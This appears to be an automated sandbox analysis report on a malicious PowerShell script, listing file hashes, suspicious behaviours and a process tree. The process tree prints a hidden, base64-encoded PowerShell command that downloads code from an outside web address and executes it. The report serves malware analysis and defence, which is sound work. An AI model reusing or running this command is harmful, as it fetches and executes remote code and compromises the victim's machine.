d58dc2ab26df5783442b79e3edb7826599494b28f3c75fa3823cbc876f3707da

General

Target

work.ps1
Size

1.4MB
MD5

7ba4b5c5d3e3276a3cfe8d581cf7173b
SHA1

79ba87b46562e75f097c1b6d23d3b63b9160bbaa
SHA256

73737bf28fa00ea1380bf98a76f6c2ff34bf25e8b489750acccc45df8e898022
SHA512

ccccc4402edc1c333f2b11955b4c2850f5b68674e473d57521cb009e2047a46f9c57c0151b9191d4a2e3b10931723d0191bba9b299ffb3bb293ff7d6f83598c6

Score

8^/10

Malware Config

Signatures

Blocklisted process makes network request 1 IoCs

Processes:

powershell.exe

flow pid process

7 1680 powershell.exe
Suspicious behavior: EnumeratesProcesses 2 IoCs

Processes:

powershell.exepowershell.exe

pid process

1844 powershell.exe
1680 powershell.exe
Suspicious use of AdjustPrivilegeToken 2 IoCs

Processes:

powershell.exepowershell.exe

description pid process

Token: SeDebugPrivilege 1844 powershell.exe
Token: SeDebugPrivilege 1680 powershell.exe

flow	pid	process
7	1680	powershell.exe

pid	process
1844	powershell.exe
1680	powershell.exe

description	pid	process
Token: SeDebugPrivilege	1844	powershell.exe
Token: SeDebugPrivilege	1680	powershell.exe

Suspicious use of WriteProcessMemory 3 IoCs

Processes:

powershell.exe

description	pid	process	target process
PID 1844 wrote to memory of 1680	1844	powershell.exe	powershell.exe
PID 1844 wrote to memory of 1680	1844	powershell.exe	powershell.exe
PID 1844 wrote to memory of 1680	1844	powershell.exe	powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File C:\Users\Admin\AppData\Local\Temp\work.ps1
1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1844
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle hidden -enc JABNAD0AWwBOAGUAdAAuAFcAZQBiAFIAZQBxAHUAZQBzAHQAXQA6ADoAQwByAGUAYQB0AGUAKAAnAGgAdAB0AHAAOgAvAC8AYQB0AGgAaQBuAGcAYwBhAGwAbABlAGQAYwBhAGsAZQAuAGMAbwBtAC8AZgBpAGwAZQAnACkAOwAkAHQAPQAkAE0ALgBHAGUAdABSAGUAcwBwAG8AbgBzAGUAKAApADsAJABSAD0AJAB0AC4ARwBlAHQAUgBlAHMAcABvAG4AcwBlAFMAdAByAGUAYQBtACgAKQA7ACQARgA9AG4AZQB3AC0AbwBiAGoAZQBjAHQAIABJAE8ALgBTAHQAcgBlAGEAbQBSAGUAYQBkAGUAcgAgACQAUgA7ACQAcAA9ACQARgAuAFIAZQBhAGQAVABvAEUAbgBkACgAKQA7AGkAZQB4ACgAJABwACkAOwAgAA==
  2⤵
  - Blocklisted process makes network request
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:1680

Network

MITRE ATT&CK Matrix

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex

MD5
c7da0296f2ff751db2bee1f60fb96bc3

SHA1
2027adc7aad82b7f9ceb790ae5f8fea3aa49ceec

SHA256
5bbff7738e03fd10bd8b47e0ed86a2400d7d52a46cadc41be3a723ed5d0b69ab

SHA512
17aad10d420cb59cd8eba8b64f5167f53fe8a6cd9a7b9e52cd53a4aa4b111bf73451828648013ef81aec3bcddb10754d536bbfff4425424381b7b670e751dce3

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

MD5
f18b2cecdb2f0b19a56a5fa4b254b7e0

SHA1
893597d400792a642b2e7fee41c3bdf3f5062347

SHA256
3bb174406252dcb336f52f43807b7d1906782c7aa2af753c63726d0066020738

SHA512
b06139db7aa51c415f6f3860a02965c787242d895a03222159362075f8eb94f8ee8b1af9b228153017335757df4019b52a8ac261be4f517b5f5af5517965cd81

Download Submit
memory/1680-70-0x0000000000000000-mapping.dmp

Download
memory/1680-80-0x000000001C7D0000-0x000000001C7D1000-memory.dmp

Filesize
4KB

Download
memory/1680-76-0x000000001AC84000-0x000000001AC86000-memory.dmp

Filesize
8KB

Download
memory/1680-75-0x000000001AC80000-0x000000001AC82000-memory.dmp

Filesize
8KB

Download
memory/1844-64-0x000000001ABC0000-0x000000001ABC2000-memory.dmp

Filesize
8KB

Download
memory/1844-67-0x000000001ABCA000-0x000000001ABE9000-memory.dmp

Filesize
124KB

Download
memory/1844-68-0x000000001B4F0000-0x000000001B4F1000-memory.dmp

Filesize
4KB

Download
memory/1844-69-0x000000001C640000-0x000000001C641000-memory.dmp

Filesize
4KB

Download
memory/1844-66-0x0000000002510000-0x0000000002511000-memory.dmp

Filesize
4KB

Download
memory/1844-65-0x000000001ABC4000-0x000000001ABC6000-memory.dmp

Filesize
8KB

Download
memory/1844-60-0x000007FEFC471000-0x000007FEFC473000-memory.dmp

Filesize
8KB

Download
memory/1844-63-0x00000000024E0000-0x00000000024E1000-memory.dmp

Filesize
4KB

Download
memory/1844-62-0x000000001AC40000-0x000000001AC41000-memory.dmp

Filesize
4KB

Download
memory/1844-61-0x00000000023A0000-0x00000000023A1000-memory.dmp

Filesize
4KB

Download

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Matrix

Replay Monitor

Loading Replay Monitor...

Downloads